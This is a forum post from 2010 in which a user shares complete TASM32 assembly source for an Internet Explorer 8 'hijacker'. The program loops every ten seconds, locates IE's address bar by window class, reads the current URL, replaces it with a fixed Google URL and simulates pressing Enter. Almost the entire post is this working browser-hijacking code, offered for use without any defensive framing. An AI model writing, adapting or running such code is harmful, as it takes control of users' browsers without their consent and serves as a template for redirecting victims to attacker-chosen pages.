JMC31337 Posted July 26, 2010 Share Posted July 26, 2010 (edited) plenty of examples of an IE 8 hijacker on the netheres one in tasm32;tasm32 /ml hijak;tlink32 -x -c -aa hijak,,,import32.386PLocalsjumps.Model Flat ,StdCallinclude windows.incextrn FindWindowExA:PROCextrn FindWindowA:PROCextrn SendMessageA:PROCextrn ExitProcess:PROCextrn MessageBoxA:PROCextrn SetForegroundWindow:PROCextrn keybd_event:PROCextrn Sleep:PROCVK_RETURN equ 0DhSW_SHOWNORMAL equ 1.data?buff db ?.datahwnd dd 0ieclass db "IEFrame",0ieworker db"WorkerW",0ieadd db "Address Combo Control",0ienav db "Navigation Bar",0ierebar db "ReBarWindow32",0iebar db "ToolBarWindow32",0ieedit db "Edit",0ieroot db"Address Band Root",0addrs db "http://www.google.com/search?hl=en&source=hp&q=&btnI=I%27m+Feeling+Lucky&aq=f&aqi=&aql=&oq=&gs_rfai=",0.codestart:loop:call Sleep,10000push 0push offset ieclasscall FindWindowAmov [hwnd],eaxpush 0push offset ieworkerpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush 0push offset ierebarpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush 0push offset ierootpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush 0push offset ieeditpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush offset buffpush 260push WM_GETTEXTpush hwndcall SendMessageA;push 0;push 0;push offset buff;push 0;call MessageBoxApush offset addrspush 0push WM_SETTEXTpush hwndcall SendMessageApush SW_SHOWNORMALpush [hwnd]call SetForegroundWindowpush 0 push 0push 0push VK_RETURNcall keybd_eventjmp loopcall ExitProcessend start Edited December 15, 2010 by JMC31337 Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now